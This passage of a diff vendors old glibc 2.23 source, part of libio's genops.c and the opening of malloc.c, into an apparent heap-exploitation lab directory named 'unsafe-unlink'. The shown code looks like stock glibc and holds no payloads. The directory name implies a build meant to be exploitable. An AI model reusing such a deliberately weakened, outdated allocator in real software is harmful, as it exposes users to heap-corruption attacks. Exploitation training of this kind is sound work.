+	  __mempcpy (__mempcpy (new_buffer + avail,
+				fp->_IO_save_end + least_mark,
+				-least_mark),
+		     fp->_IO_read_base,
+		     end_p - fp->_IO_read_base);
+#else
+	  memcpy (new_buffer + avail,
+		  fp->_IO_save_end + least_mark,
+		  -least_mark);
+	  memcpy (new_buffer + avail - least_mark,
+		  fp->_IO_read_base,
+		  end_p - fp->_IO_read_base);
+#endif
+	}
+      else
+	memcpy (new_buffer + avail,
+		fp->_IO_read_base + least_mark,
+		needed_size);
+      free (fp->_IO_save_base);
+      fp->_IO_save_base = new_buffer;
+      fp->_IO_save_end = new_buffer + avail + needed_size;
+    }
+  else
+    {
+      avail = current_Bsize - needed_size;
+      if (least_mark < 0)
+	{
+	  memmove (fp->_IO_save_base + avail,
+		   fp->_IO_save_end + least_mark,
+		   -least_mark);
+	  memcpy (fp->_IO_save_base + avail - least_mark,
+		  fp->_IO_read_base,
+		  end_p - fp->_IO_read_base);
+	}
+      else if (needed_size > 0)
+	memcpy (fp->_IO_save_base + avail,
+		fp->_IO_read_base + least_mark,
+		needed_size);
+    }
+  fp->_IO_backup_base = fp->_IO_save_base + avail;
+  /* Adjust all the streammarkers. */
+  delta = end_p - fp->_IO_read_base;
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    mark->_pos -= delta;
+  return 0;
+}
+
+int
+__underflow (_IO_FILE *fp)
+{
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
+    return EOF;
+#endif
+
+  if (fp->_mode == 0)
+    _IO_fwide (fp, -1);
+  if (_IO_in_put_mode (fp))
+    if (_IO_switch_to_get_mode (fp) == EOF)
+      return EOF;
+  if (fp->_IO_read_ptr < fp->_IO_read_end)
+    return *(unsigned char *) fp->_IO_read_ptr;
+  if (_IO_in_backup (fp))
+    {
+      _IO_switch_to_main_get_area (fp);
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	return *(unsigned char *) fp->_IO_read_ptr;
+    }
+  if (_IO_have_markers (fp))
+    {
+      if (save_for_backup (fp, fp->_IO_read_end))
+	return EOF;
+    }
+  else if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+  return _IO_UNDERFLOW (fp);
+}
+libc_hidden_def (__underflow)
+
+int
+__uflow (_IO_FILE *fp)
+{
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
+    return EOF;
+#endif
+
+  if (fp->_mode == 0)
+    _IO_fwide (fp, -1);
+  if (_IO_in_put_mode (fp))
+    if (_IO_switch_to_get_mode (fp) == EOF)
+      return EOF;
+  if (fp->_IO_read_ptr < fp->_IO_read_end)
+    return *(unsigned char *) fp->_IO_read_ptr++;
+  if (_IO_in_backup (fp))
+    {
+      _IO_switch_to_main_get_area (fp);
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	return *(unsigned char *) fp->_IO_read_ptr++;
+    }
+  if (_IO_have_markers (fp))
+    {
+      if (save_for_backup (fp, fp->_IO_read_end))
+	return EOF;
+    }
+  else if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+  return _IO_UFLOW (fp);
+}
+libc_hidden_def (__uflow)
+
+void
+_IO_setb (_IO_FILE *f, char *b, char *eb, int a)
+{
+  if (f->_IO_buf_base && !(f->_flags & _IO_USER_BUF))
+    free (f->_IO_buf_base);
+  f->_IO_buf_base = b;
+  f->_IO_buf_end = eb;
+  if (a)
+    f->_flags &= ~_IO_USER_BUF;
+  else
+    f->_flags |= _IO_USER_BUF;
+}
+libc_hidden_def (_IO_setb)
+
+void
+_IO_doallocbuf (_IO_FILE *fp)
+{
+  if (fp->_IO_buf_base)
+    return;
+  if (!(fp->_flags & _IO_UNBUFFERED) || fp->_mode > 0)
+    if (_IO_DOALLOCATE (fp) != EOF)
+      return;
+  _IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
+}
+libc_hidden_def (_IO_doallocbuf)
+
+int
+_IO_default_underflow (_IO_FILE *fp)
+{
+  return EOF;
+}
+
+int
+_IO_default_uflow (_IO_FILE *fp)
+{
+  int ch = _IO_UNDERFLOW (fp);
+  if (ch == EOF)
+    return EOF;
+  return *(unsigned char *) fp->_IO_read_ptr++;
+}
+libc_hidden_def (_IO_default_uflow)
+
+_IO_size_t
+_IO_default_xsputn (_IO_FILE *f, const void *data, _IO_size_t n)
+{
+  const char *s = (char *) data;
+  _IO_size_t more = n;
+  if (more <= 0)
+    return 0;
+  for (;;)
+    {
+      /* Space available. */
+      if (f->_IO_write_ptr < f->_IO_write_end)
+	{
+	  _IO_size_t count = f->_IO_write_end - f->_IO_write_ptr;
+	  if (count > more)
+	    count = more;
+	  if (count > 20)
+	    {
+#ifdef _LIBC
+	      f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
+#else
+	      memcpy (f->_IO_write_ptr, s, count);
+	      f->_IO_write_ptr += count;
+#endif
+	      s += count;
+	    }
+	  else if (count)
+	    {
+	      char *p = f->_IO_write_ptr;
+	      _IO_ssize_t i;
+	      for (i = count; --i >= 0; )
+		*p++ = *s++;
+	      f->_IO_write_ptr = p;
+	    }
+	  more -= count;
+	}
+      if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
+	break;
+      more--;
+    }
+  return n - more;
+}
+libc_hidden_def (_IO_default_xsputn)
+
+_IO_size_t
+_IO_sgetn (_IO_FILE *fp, void *data, _IO_size_t n)
+{
+  /* FIXME handle putback buffer here! */
+  return _IO_XSGETN (fp, data, n);
+}
+libc_hidden_def (_IO_sgetn)
+
+_IO_size_t
+_IO_default_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)
+{
+  _IO_size_t more = n;
+  char *s = (char*) data;
+  for (;;)
+    {
+      /* Data available. */
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	{
+	  _IO_size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
+	  if (count > more)
+	    count = more;
+	  if (count > 20)
+	    {
+#ifdef _LIBC
+	      s = __mempcpy (s, fp->_IO_read_ptr, count);
+#else
+	      memcpy (s, fp->_IO_read_ptr, count);
+	      s += count;
+#endif
+	      fp->_IO_read_ptr += count;
+	    }
+	  else if (count)
+	    {
+	      char *p = fp->_IO_read_ptr;
+	      int i = (int) count;
+	      while (--i >= 0)
+		*s++ = *p++;
+	      fp->_IO_read_ptr = p;
+	    }
+	    more -= count;
+	}
+      if (more == 0 || __underflow (fp) == EOF)
+	break;
+    }
+  return n - more;
+}
+libc_hidden_def (_IO_default_xsgetn)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_sync (_IO_FILE *fp)
+{
+  return 0;
+}
+#endif
+
+_IO_FILE *
+_IO_default_setbuf (_IO_FILE *fp, char *p, _IO_ssize_t len)
+{
+    if (_IO_SYNC (fp) == EOF)
+	return NULL;
+    if (p == NULL || len == 0)
+      {
+	fp->_flags |= _IO_UNBUFFERED;
+	_IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
+      }
+    else
+      {
+	fp->_flags &= ~_IO_UNBUFFERED;
+	_IO_setb (fp, p, p+len, 0);
+      }
+    fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = 0;
+    fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_read_end = 0;
+    return fp;
+}
+
+_IO_off64_t
+_IO_default_seekpos (_IO_FILE *fp, _IO_off64_t pos, int mode)
+{
+  return _IO_SEEKOFF (fp, pos, 0, mode);
+}
+
+int
+_IO_default_doallocate (_IO_FILE *fp)
+{
+  char *buf;
+
+  buf = malloc(_IO_BUFSIZ);
+  if (__glibc_unlikely (buf == NULL))
+    return EOF;
+
+  _IO_setb (fp, buf, buf+_IO_BUFSIZ, 1);
+  return 1;
+}
+libc_hidden_def (_IO_default_doallocate)
+
+void
+_IO_init (_IO_FILE *fp, int flags)
+{
+  _IO_no_init (fp, flags, -1, NULL, NULL);
+}
+libc_hidden_def (_IO_init)
+
+void
+_IO_old_init (_IO_FILE *fp, int flags)
+{
+  fp->_flags = _IO_MAGIC|flags;
+  fp->_flags2 = 0;
+  fp->_IO_buf_base = NULL;
+  fp->_IO_buf_end = NULL;
+  fp->_IO_read_base = NULL;
+  fp->_IO_read_ptr = NULL;
+  fp->_IO_read_end = NULL;
+  fp->_IO_write_base = NULL;
+  fp->_IO_write_ptr = NULL;
+  fp->_IO_write_end = NULL;
+  fp->_chain = NULL; /* Not necessary. */
+
+  fp->_IO_save_base = NULL;
+  fp->_IO_backup_base = NULL;
+  fp->_IO_save_end = NULL;
+  fp->_markers = NULL;
+  fp->_cur_column = 0;
+#if _IO_JUMPS_OFFSET
+  fp->_vtable_offset = 0;
+#endif
+#ifdef _IO_MTSAFE_IO
+  if (fp->_lock != NULL)
+    _IO_lock_init (*fp->_lock);
+#endif
+}
+
+void
+_IO_no_init (_IO_FILE *fp, int flags, int orientation,
+	     struct _IO_wide_data *wd, const struct _IO_jump_t *jmp)
+{
+  _IO_old_init (fp, flags);
+  fp->_mode = orientation;
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (orientation >= 0)
+    {
+      fp->_wide_data = wd;
+      fp->_wide_data->_IO_buf_base = NULL;
+      fp->_wide_data->_IO_buf_end = NULL;
+      fp->_wide_data->_IO_read_base = NULL;
+      fp->_wide_data->_IO_read_ptr = NULL;
+      fp->_wide_data->_IO_read_end = NULL;
+      fp->_wide_data->_IO_write_base = NULL;
+      fp->_wide_data->_IO_write_ptr = NULL;
+      fp->_wide_data->_IO_write_end = NULL;
+      fp->_wide_data->_IO_save_base = NULL;
+      fp->_wide_data->_IO_backup_base = NULL;
+      fp->_wide_data->_IO_save_end = NULL;
+
+      fp->_wide_data->_wide_vtable = jmp;
+    }
+  else
+    /* Cause predictable crash when a wide function is called on a byte
+       stream.  */
+    fp->_wide_data = (struct _IO_wide_data *) -1L;
+#endif
+  fp->_freeres_list = NULL;
+}
+
+int
+_IO_default_sync (_IO_FILE *fp)
+{
+  return 0;
+}
+
+/* The way the C++ classes are mapped into the C functions in the
+   current implementation, this function can get called twice! */
+
+void
+_IO_default_finish (_IO_FILE *fp, int dummy)
+{
+  struct _IO_marker *mark;
+  if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))
+    {
+      free (fp->_IO_buf_base);
+      fp->_IO_buf_base = fp->_IO_buf_end = NULL;
+    }
+
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    mark->_sbuf = NULL;
+
+  if (fp->_IO_save_base)
+    {
+      free (fp->_IO_save_base);
+      fp->_IO_save_base = NULL;
+    }
+
+  _IO_un_link ((struct _IO_FILE_plus *) fp);
+
+#ifdef _IO_MTSAFE_IO
+  if (fp->_lock != NULL)
+    _IO_lock_fini (*fp->_lock);
+#endif
+}
+libc_hidden_def (_IO_default_finish)
+
+_IO_off64_t
+_IO_default_seekoff (_IO_FILE *fp, _IO_off64_t offset, int dir, int mode)
+{
+  return _IO_pos_BAD;
+}
+
+int
+_IO_sputbackc (_IO_FILE *fp, int c)
+{
+  int result;
+
+  if (fp->_IO_read_ptr > fp->_IO_read_base
+      && (unsigned char)fp->_IO_read_ptr[-1] == (unsigned char)c)
+    {
+      fp->_IO_read_ptr--;
+      result = (unsigned char) c;
+    }
+  else
+    result = _IO_PBACKFAIL (fp, c);
+
+  if (result != EOF)
+    fp->_flags &= ~_IO_EOF_SEEN;
+
+  return result;
+}
+libc_hidden_def (_IO_sputbackc)
+
+int
+_IO_sungetc (_IO_FILE *fp)
+{
+  int result;
+
+  if (fp->_IO_read_ptr > fp->_IO_read_base)
+    {
+      fp->_IO_read_ptr--;
+      result = (unsigned char) *fp->_IO_read_ptr;
+    }
+  else
+    result = _IO_PBACKFAIL (fp, EOF);
+
+  if (result != EOF)
+    fp->_flags &= ~_IO_EOF_SEEN;
+
+  return result;
+}
+
+#if 0 /* Work in progress */
+/* Seems not to be needed.  */
+#if 0
+void
+_IO_set_column (_IO_FILE *fp, int c)
+{
+  if (c == -1)
+    fp->_column = -1;
+  else
+    fp->_column = c - (fp->_IO_write_ptr - fp->_IO_write_base);
+}
+#else
+int
+_IO_set_column (_IO_FILE *fp, int i)
+{
+  fp->_cur_column = i + 1;
+  return 0;
+}
+#endif
+#endif
+
+
+unsigned
+_IO_adjust_column (unsigned start, const char *line, int count)
+{
+  const char *ptr = line + count;
+  while (ptr > line)
+    if (*--ptr == '\n')
+      return line + count - ptr - 1;
+  return start + count;
+}
+libc_hidden_def (_IO_adjust_column)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_get_column (_IO_FILE *fp)
+{
+  if (fp->_cur_column)
+    return _IO_adjust_column (fp->_cur_column - 1,
+			      fp->_IO_write_base,
+			      fp->_IO_write_ptr - fp->_IO_write_base);
+  return -1;
+}
+#endif
+
+
+int
+_IO_flush_all_lockp (int do_lock)
+{
+  int result = 0;
+  struct _IO_FILE *fp;
+  int last_stamp;
+
+#ifdef _IO_MTSAFE_IO
+  __libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
+  if (do_lock)
+    _IO_lock_lock (list_all_lock);
+#endif
+
+  last_stamp = _IO_list_all_stamp;
+  fp = (_IO_FILE *) _IO_list_all;
+  while (fp != NULL)
+    {
+      run_fp = fp;
+      if (do_lock)
+	_IO_flockfile (fp);
+
+      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+	   || (_IO_vtable_offset (fp) == 0
+	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
+				    > fp->_wide_data->_IO_write_base))
+#endif
+	   )
+	  && _IO_OVERFLOW (fp, EOF) == EOF)
+	result = EOF;
+
+      if (do_lock)
+	_IO_funlockfile (fp);
+      run_fp = NULL;
+
+      if (last_stamp != _IO_list_all_stamp)
+	{
+	  /* Something was added to the list.  Start all over again.  */
+	  fp = (_IO_FILE *) _IO_list_all;
+	  last_stamp = _IO_list_all_stamp;
+	}
+      else
+	fp = fp->_chain;
+    }
+
+#ifdef _IO_MTSAFE_IO
+  if (do_lock)
+    _IO_lock_unlock (list_all_lock);
+  __libc_cleanup_region_end (0);
+#endif
+
+  return result;
+}
+
+
+int
+_IO_flush_all (void)
+{
+  /* We want locking.  */
+  return _IO_flush_all_lockp (1);
+}
+libc_hidden_def (_IO_flush_all)
+
+void
+_IO_flush_all_linebuffered (void)
+{
+  struct _IO_FILE *fp;
+  int last_stamp;
+
+#ifdef _IO_MTSAFE_IO
+  _IO_cleanup_region_start_noarg (flush_cleanup);
+  _IO_lock_lock (list_all_lock);
+#endif
+
+  last_stamp = _IO_list_all_stamp;
+  fp = (_IO_FILE *) _IO_list_all;
+  while (fp != NULL)
+    {
+      run_fp = fp;
+      _IO_flockfile (fp);
+
+      if ((fp->_flags & _IO_NO_WRITES) == 0 && fp->_flags & _IO_LINE_BUF)
+	_IO_OVERFLOW (fp, EOF);
+
+      _IO_funlockfile (fp);
+      run_fp = NULL;
+
+      if (last_stamp != _IO_list_all_stamp)
+	{
+	  /* Something was added to the list.  Start all over again.  */
+	  fp = (_IO_FILE *) _IO_list_all;
+	  last_stamp = _IO_list_all_stamp;
+	}
+      else
+	fp = fp->_chain;
+    }
+
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_unlock (list_all_lock);
+  _IO_cleanup_region_end (0);
+#endif
+}
+libc_hidden_def (_IO_flush_all_linebuffered)
+#ifdef _LIBC
+weak_alias (_IO_flush_all_linebuffered, _flushlbf)
+#endif
+
+
+/* The following is a bit tricky.  In general, we want to unbuffer the
+   streams so that all output which follows is seen.  If we are not
+   looking for memory leaks it does not make much sense to free the
+   actual buffer because this will happen anyway once the program
+   terminated.  If we do want to look for memory leaks we have to free
+   the buffers.  Whether something is freed is determined by the
+   function sin the libc_freeres section.  Those are called as part of
+   the atexit routine, just like _IO_cleanup.  The problem is we do
+   not know whether the freeres code is called first or _IO_cleanup.
+   if the former is the case, we set the DEALLOC_BUFFER variable to
+   true and _IO_unbuffer_all will take care of the rest.  If
+   _IO_unbuffer_all is called first we add the streams to a list
+   which the freeres function later can walk through.  */
+static void _IO_unbuffer_all (void);
+
+static bool dealloc_buffers;
+static _IO_FILE *freeres_list;
+
+static void
+_IO_unbuffer_all (void)
+{
+  struct _IO_FILE *fp;
+  for (fp = (_IO_FILE *) _IO_list_all; fp; fp = fp->_chain)
+    {
+      if (! (fp->_flags & _IO_UNBUFFERED)
+	  /* Iff stream is un-orientated, it wasn't used. */
+	  && fp->_mode != 0)
+	{
+#ifdef _IO_MTSAFE_IO
+	  int cnt;
+#define MAXTRIES 2
+	  for (cnt = 0; cnt < MAXTRIES; ++cnt)
+	    if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0)
+	      break;
+	    else
+	      /* Give the other thread time to finish up its use of the
+		 stream.  */
+	      __sched_yield ();
+#endif
+
+	  if (! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
+	    {
+	      fp->_flags |= _IO_USER_BUF;
+
+	      fp->_freeres_list = freeres_list;
+	      freeres_list = fp;
+	      fp->_freeres_buf = fp->_IO_buf_base;
+	    }
+
+	  _IO_SETBUF (fp, NULL, 0);
+
+	  if (fp->_mode > 0)
+	    _IO_wsetb (fp, NULL, NULL, 0);
+
+#ifdef _IO_MTSAFE_IO
+	  if (cnt < MAXTRIES && fp->_lock != NULL)
+	    _IO_lock_unlock (*fp->_lock);
+#endif
+	}
+
+      /* Make sure that never again the wide char functions can be
+	 used.  */
+      fp->_mode = -1;
+    }
+}
+
+
+libc_freeres_fn (buffer_free)
+{
+  dealloc_buffers = true;
+
+  while (freeres_list != NULL)
+    {
+      free (freeres_list->_freeres_buf);
+
+      freeres_list = freeres_list->_freeres_list;
+    }
+}
+
+
+int
+_IO_cleanup (void)
+{
+  /* We do *not* want locking.  Some threads might use streams but
+     that is their problem, we flush them underneath them.  */
+  int result = _IO_flush_all_lockp (0);
+
+  /* We currently don't have a reliable mechanism for making sure that
+     C++ static destructors are executed in the correct order.
+     So it is possible that other static destructors might want to
+     write to cout - and they're supposed to be able to do so.
+
+     The following will make the standard streambufs be unbuffered,
+     which forces any output from late destructors to be written out. */
+  _IO_unbuffer_all ();
+
+  return result;
+}
+
+
+void
+_IO_init_marker (struct _IO_marker *marker, _IO_FILE *fp)
+{
+  marker->_sbuf = fp;
+  if (_IO_in_put_mode (fp))
+    _IO_switch_to_get_mode (fp);
+  if (_IO_in_backup (fp))
+    marker->_pos = fp->_IO_read_ptr - fp->_IO_read_end;
+  else
+    marker->_pos = fp->_IO_read_ptr - fp->_IO_read_base;
+
+  /* Should perhaps sort the chain? */
+  marker->_next = fp->_markers;
+  fp->_markers = marker;
+}
+
+void
+_IO_remove_marker (struct _IO_marker *marker)
+{
+  /* Unlink from sb's chain. */
+  struct _IO_marker **ptr = &marker->_sbuf->_markers;
+  for (; ; ptr = &(*ptr)->_next)
+    {
+      if (*ptr == NULL)
+	break;
+      else if (*ptr == marker)
+	{
+	  *ptr = marker->_next;
+	  return;
+	}
+    }
+#if 0
+    if _sbuf has a backup area that is no longer needed, should we delete
+    it now, or wait until the next underflow?
+#endif
+}
+
+#define BAD_DELTA EOF
+
+int
+_IO_marker_difference (struct _IO_marker *mark1, struct _IO_marker *mark2)
+{
+  return mark1->_pos - mark2->_pos;
+}
+
+/* Return difference between MARK and current position of MARK's stream. */
+int
+_IO_marker_delta (struct _IO_marker *mark)
+{
+  int cur_pos;
+  if (mark->_sbuf == NULL)
+    return BAD_DELTA;
+  if (_IO_in_backup (mark->_sbuf))
+    cur_pos = mark->_sbuf->_IO_read_ptr - mark->_sbuf->_IO_read_end;
+  else
+    cur_pos = mark->_sbuf->_IO_read_ptr - mark->_sbuf->_IO_read_base;
+  return mark->_pos - cur_pos;
+}
+
+int
+_IO_seekmark (_IO_FILE *fp, struct _IO_marker *mark, int delta)
+{
+  if (mark->_sbuf != fp)
+    return EOF;
+ if (mark->_pos >= 0)
+    {
+      if (_IO_in_backup (fp))
+	_IO_switch_to_main_get_area (fp);
+      fp->_IO_read_ptr = fp->_IO_read_base + mark->_pos;
+    }
+  else
+    {
+      if (!_IO_in_backup (fp))
+	_IO_switch_to_backup_area (fp);
+      fp->_IO_read_ptr = fp->_IO_read_end + mark->_pos;
+    }
+  return 0;
+}
+
+void
+_IO_unsave_markers (_IO_FILE *fp)
+{
+  struct _IO_marker *mark = fp->_markers;
+  if (mark)
+    {
+#ifdef TODO
+      streampos offset = seekoff (0, ios::cur, ios::in);
+      if (offset != EOF)
+	{
+	  offset += eGptr () - Gbase ();
+	  for ( ; mark != NULL; mark = mark->_next)
+	    mark->set_streampos (mark->_pos + offset);
+	}
+    else
+      {
+	for ( ; mark != NULL; mark = mark->_next)
+	  mark->set_streampos (EOF);
+      }
+#endif
+      fp->_markers = 0;
+    }
+
+  if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+}
+libc_hidden_def (_IO_unsave_markers)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_nobackup_pbackfail (_IO_FILE *fp, int c)
+{
+  if (fp->_IO_read_ptr > fp->_IO_read_base)
+	fp->_IO_read_ptr--;
+  if (c != EOF && *fp->_IO_read_ptr != c)
+      *fp->_IO_read_ptr = c;
+  return (unsigned char) c;
+}
+#endif
+
+int
+_IO_default_pbackfail (_IO_FILE *fp, int c)
+{
+  if (fp->_IO_read_ptr > fp->_IO_read_base && !_IO_in_backup (fp)
+      && (unsigned char) fp->_IO_read_ptr[-1] == c)
+    --fp->_IO_read_ptr;
+  else
+    {
+      /* Need to handle a filebuf in write mode (switch to read mode). FIXME!*/
+      if (!_IO_in_backup (fp))
+	{
+	  /* We need to keep the invariant that the main get area
+	     logically follows the backup area.  */
+	  if (fp->_IO_read_ptr > fp->_IO_read_base && _IO_have_backup (fp))
+	    {
+	      if (save_for_backup (fp, fp->_IO_read_ptr))
+		return EOF;
+	    }
+	  else if (!_IO_have_backup (fp))
+	    {
+	      /* No backup buffer: allocate one. */
+	      /* Use nshort buffer, if unused? (probably not)  FIXME */
+	      int backup_size = 128;
+	      char *bbuf = (char *) malloc (backup_size);
+	      if (bbuf == NULL)
+		return EOF;
+	      fp->_IO_save_base = bbuf;
+	      fp->_IO_save_end = fp->_IO_save_base + backup_size;
+	      fp->_IO_backup_base = fp->_IO_save_end;
+	    }
+	  fp->_IO_read_base = fp->_IO_read_ptr;
+	  _IO_switch_to_backup_area (fp);
+	}
+      else if (fp->_IO_read_ptr <= fp->_IO_read_base)
+	{
+	  /* Increase size of existing backup buffer. */
+	  _IO_size_t new_size;
+	  _IO_size_t old_size = fp->_IO_read_end - fp->_IO_read_base;
+	  char *new_buf;
+	  new_size = 2 * old_size;
+	  new_buf = (char *) malloc (new_size);
+	  if (new_buf == NULL)
+	    return EOF;
+	  memcpy (new_buf + (new_size - old_size), fp->_IO_read_base,
+		  old_size);
+	  free (fp->_IO_read_base);
+	  _IO_setg (fp, new_buf, new_buf + (new_size - old_size),
+		    new_buf + new_size);
+	  fp->_IO_backup_base = fp->_IO_read_ptr;
+	}
+
+      *--fp->_IO_read_ptr = c;
+    }
+  return (unsigned char) c;
+}
+libc_hidden_def (_IO_default_pbackfail)
+
+_IO_off64_t
+_IO_default_seek (_IO_FILE *fp, _IO_off64_t offset, int dir)
+{
+  return _IO_pos_BAD;
+}
+
+int
+_IO_default_stat (_IO_FILE *fp, void *st)
+{
+  return EOF;
+}
+
+_IO_ssize_t
+_IO_default_read (_IO_FILE *fp, void *data, _IO_ssize_t n)
+{
+  return -1;
+}
+
+_IO_ssize_t
+_IO_default_write (_IO_FILE *fp, const void *data, _IO_ssize_t n)
+{
+  return 0;
+}
+
+int
+_IO_default_showmanyc (_IO_FILE *fp)
+{
+  return -1;
+}
+
+void
+_IO_default_imbue (_IO_FILE *fp, void *locale)
+{
+}
+
+_IO_ITER
+_IO_iter_begin (void)
+{
+  return (_IO_ITER) _IO_list_all;
+}
+libc_hidden_def (_IO_iter_begin)
+
+_IO_ITER
+_IO_iter_end (void)
+{
+  return NULL;
+}
+libc_hidden_def (_IO_iter_end)
+
+_IO_ITER
+_IO_iter_next (_IO_ITER iter)
+{
+  return iter->_chain;
+}
+libc_hidden_def (_IO_iter_next)
+
+_IO_FILE *
+_IO_iter_file (_IO_ITER iter)
+{
+  return iter;
+}
+libc_hidden_def (_IO_iter_file)
+
+void
+_IO_list_lock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_lock (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_lock)
+
+void
+_IO_list_unlock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_unlock (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_unlock)
+
+void
+_IO_list_resetlock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_init (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_resetlock)
+
+
+#ifdef TODO
+#if defined(linux)
+#define IO_CLEANUP ;
+#endif
+
+#ifdef IO_CLEANUP
+  IO_CLEANUP
+#else
+struct __io_defs {
+    __io_defs() { }
+    ~__io_defs() { _IO_cleanup (); }
+};
+__io_defs io_defs__;
+#endif
+
+#endif /* TODO */
+
+#ifdef text_set_element
+text_set_element(__libc_atexit, _IO_cleanup);
+#endif
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/malloc/malloc.c
new file mode 100644
index 0000000..096ec89
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/malloc/malloc.c
@@ -0,0 +1,5239 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    cfree(void* p);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
